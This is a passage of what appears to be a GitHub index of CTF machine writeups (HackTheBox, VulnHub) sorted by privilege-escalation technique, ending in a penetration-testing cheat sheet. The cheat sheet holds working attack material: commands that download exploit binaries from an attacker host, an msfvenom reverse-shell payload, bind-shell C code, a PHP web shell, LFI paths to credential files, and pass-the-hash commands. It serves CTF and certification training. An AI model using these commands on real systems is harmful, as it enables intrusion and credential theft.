|---|------|-------|-----------|------|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
---
<a name="privesc_setuid"></a>
#### privesc_setuid [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
| 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 4. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 5. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 6. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="privesc_shell_escape"></a>
#### privesc_shell_escape [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
---
<a name="privesc_ssh_authorizedkeys"></a>
#### privesc_ssh_authorizedkeys [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) |
---
<a name="privesc_ssh_knownhosts"></a>
#### privesc_ssh_knownhosts [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100" /> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) |
---
<a name="privesc_strace_setuid"></a>
#### privesc_strace_setuid [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) |
---
<a name="privesc_sudo"></a>
#### privesc_sudo [⇡](#privesc)
using `sudo` to execute programs that run with elevated privileges
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) |
| 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 3. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 4. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 5. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
| 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
---
<a name="privesc_sudoers"></a>
#### privesc_sudoers [⇡](#privesc)
being able to edit the `/etc/sudoers` file to give a user elevated privileges
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 2. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 3. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 4. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) |
| 5. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 7. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="privesc_tmux_rootsession"></a>
#### privesc_tmux_rootsession [⇡](#privesc)
---
<a name="privesc_windows_ms10_059"></a>
#### privesc_windows_ms10_059 [⇡](#privesc)
```shell
wget https://github.com/abatchy17/WindowsExploits/raw/master/MS10-059%20-%20Chimichurri/MS10-059.exe
sharehttp <targetport>
certutil.exe -urlcache -split -f "http://<attackerip>:<targetport>/MS10-059.exe" pe.exe
nc -nlvp 444
pe.exe <attackerip> 444
```
[+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560
[+] https://github.com/abatchy17/WindowsExploits/tree/master/MS10-059%20-%20Chimichurri
---
<a name="privesc_windows_ms11_046"></a>
#### privesc_windows_ms11_046 [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) |
---
<a name="privesc_windows_ms14_070"></a>
#### privesc_windows_ms14_070 [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) |
---
<a name="privesc_windows_ms15_051"></a>
#### privesc_windows_ms15_051 [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) |
---
<a name="privesc_windows_ms16_032"></a>
#### privesc_windows_ms16_032 [⇡](#privesc)
---
<a name="privesc_windows_ms16_098"></a>
#### privesc_windows_ms16_098 [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) |
---
<a name="privesc_windows_upnphost"></a>
#### privesc_windows_upnphost [⇡](#privesc)
On a Windows XP system, we can modify the insecurely configured `upnphost` service to gain elevated privileges. This can be done by creating a reverse shell binary and getting it executed by restarting the vulnerable service.
```shell
msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pe.exe
# upload pe.exe file to the target system
sudo nc -nlvp <attackerport>
sc config upnphost binpath= "C:\Inetpub\wwwroot\pe.exe"
sc qc upnphost
sc config upnphost obj= ".\LocalSystem" password= ""
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
```
[+] https://www.hackingdream.net/2020/03/windows-privilege-escalation-cheatsheet-for-oscp.html
---
<a name="tips"></a>
## ⚡ Tips [↟](#contents)
### bind shell [🡑](#tips)
```
bs.c
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char* argv[]) {
int host_sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in host_addr;
host_addr.sin_family = AF_INET;
host_addr.sin_port = htons(atoi(argv[1]));
host_addr.sin_addr.s_addr = INADDR_ANY;
bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
listen(host_sock, 0);
int client_sock = accept(host_sock, NULL, NULL);
dup2(client_sock, 0);
dup2(client_sock, 1);
dup2(client_sock, 2);
execve("/bin/bash", NULL, NULL);
}
gcc -m32 -o bs bs.c
./bs 4444
```
### buffer overflow [🡑](#tips)
```
payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length>
pattern create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <attackerport>
pattern offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <attackerport> -q <address>
nasm: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp eax
bad characters:
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
find address for "jmp esp" using mona.py:
!mona jmp -r esp -b <list of bad chars>
gcc compilation options:
linux: gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
-wl,--hash-style=both: linker option to enable both gnu and sysv style hashtable support
references:
https://github.com/s0wr0b1ndef/OSCP-note/blob/master/Buffer_overflow/info.txt
https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md
```
### file transfers [🡑](#tips)
```
certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<targetip>/file.exe','C:\Users\user\Desktop\file.exe')"
python3 -m pyftpdlib -p 21
rdesktop <targetip> -r disk:remotedisk=/usr/share/windows-binaries
gzip+xxd:
sender:
gzip -c < file > file.gz
xxd -p file.gz | tr -d '\n' && echo
receiver:
echo 1f8b...0000 > /tmp/file.gz.hex
xxd -p -r < /tmp/file.gz.hex > /tmp/file.gz
gunzip -c < /tmp/file.gz > /tmp/file
automate file download via windows ftp client:
echo open <targetip> >ftp_commands.txt
echo anonymous >>ftp_commands.txt
echo whatever >>ftp_commands.txt
echo binary >>ftp_commands.txt
echo get met8888.exe >>ftp_commands.txt
echo bye >>ftp_commands.txt
ftp -s:ftp_commands.txt
create wget.vbs and download netcat:
>C:\Windows\d.vbs
echo strUrl = WScript.Arguments.Item(0) >>C:\Windows\d.vbs
echo StrFile = WScript.Arguments.Item(1) >>C:\Windows\d.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >>C:\Windows\d.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >>C:\Windows\d.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >>C:\Windows\d.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >>C:\Windows\d.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >>C:\Windows\d.vbs
echo Err.Clear >>C:\Windows\d.vbs
echo Set http = Nothing >>C:\Windows\d.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\Windows\d.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >>C:\Windows\d.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>C:\Windows\d.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >>C:\Windows\d.vbs
echo http.Open "GET", strURL, False >>C:\Windows\d.vbs
echo http.Send >>C:\Windows\d.vbs
echo varByteArray = http.ResponseBody >>C:\Windows\d.vbs
echo Set http = Nothing >>C:\Windows\d.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >>C:\Windows\d.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >>C:\Windows\d.vbs
echo strData = "" >>C:\Windows\d.vbs
echo strBuffer = "" >>C:\Windows\d.vbs
echo For lngCounter = 0 to UBound(varByteArray) >>C:\Windows\d.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >>C:\Windows\d.vbs
echo Next >>C:\Windows\d.vbs
echo ts.Close >>C:\Windows\d.vbs
dir C:\Windows\d.vbs
C:\Windows\d.vbs "http://<targetip>/nc.exe" C:\Windows\nc.exe
netcat:
nc -w3 <targetip> 1234 <file.sent
cmd /c nc.exe -l -v -p 1234 >file.rcvd
smb (139/tcp, 445/tcp):
server: python smbserver.py -smb2support shared $HOME/toolbox/scripts/shared
copy ntlm/lm hashes submitted by windows clients during transfers and crack via jtr/hashcat
client:
list files: smbclient -L <targetip> --no-pass
list files: net view \\<targetip>
list files: dir \\<targetip>\shared
copy files: copy \\<targetip>\shared\met8888.exe
execute files: \\<targetip>\shared\met8888.exe
tftp (69/udp):
server:
atftpd --daemon --port 69 $HOME/toolbox/scripts/shared
metasploit:
use auxiliary/server/tftp
set TFTPROOT $HOME/toolbox/scripts/shared
exploit
client:
download: tftp -i <targetip> GET met8888.exe
upload: tftp -i <targetip> PUT hashes.txt
install: pkgmgr /iu:"TFTP"
```
### heartbleed [🡑](#tips)
```
nmap --script=ssl-heartbleed -p <targetport> <targetip>
https://github.com/sensepost/heartbleed-poc
python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport>
strings dump.bin
```
### iptables [🡑](#tips)
```
config file: /etc/iptables/rules.v4
```
### lfi/rfi/image upload [🡑](#tips)
```
scan:
uniscan -u http://<targetip>/ -qweds
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://<targetip>/FUZZ
php b64 leak and command execution:
php://filter/convert.base64-encode/resource=<pagename>
<?php echo passthru($_GET[cmd]) ?>
bypass upload filter:
change extension to PHP, PHP3, PHP4, PHP5
add magic bytes to start of file (eg: GIF87 to a php shell) to evade upload filters
local file access: http://<targetip>/?page=php://filter/convert.base64-encode/resource=index
notice urls that accept a generic filename as parameter:
?page=file1.php
?page=../../../../../../etc/passwd
?page=../../../../../../windows/system32/drivers/etc/hosts
ippsec steps (htb.beep: https://youtu.be/XJmBpOd__N8):
/etc/passwd
/proc/self/status
find home username in passwd, locate home directory for user:
/var/lib/asterisk/.ssh/id_rsa
```
### passthehash [🡑](#tips)
```
pth-toolkit:
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
xfreerdp:
apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
meterpreter:
meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell
misc:
fgdump.exe
/usr/bin/pth-winexe -U administrator%0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 //<targetip> cmd.exe
wmiexec.exe -hashes 0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 administrator@localhost
```
### passwords [🡑](#tips)
```
shadow file structure: $id$salt$password
generate shadow file hash:
mkpasswd -m md5 password salt
mkpasswd -m sha-256 password salt
mkpasswd -m sha-512 password salt
```
